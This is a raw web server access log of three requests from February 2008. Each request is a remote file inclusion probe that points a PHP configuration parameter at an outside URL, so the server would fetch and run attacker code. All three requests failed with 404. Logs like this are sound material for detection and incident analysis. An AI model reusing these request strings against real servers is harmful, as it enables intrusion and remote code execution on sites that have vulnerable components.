217.133.191.100 - - [08/Feb/2008:05:33:55 -0800] "GET /logs//components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.fwfccucc.org/n? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:34:15 -0800] "GET /logs/access_080101.log/linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
123.242.224.57 - - [08/Feb/2008:05:34:34 -0800] "GET /logs/access_071219.log/linkpoint.inc.php?config[root_dir]=http://mynchn.ms.kr/bbs//include/.r/ins.c?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
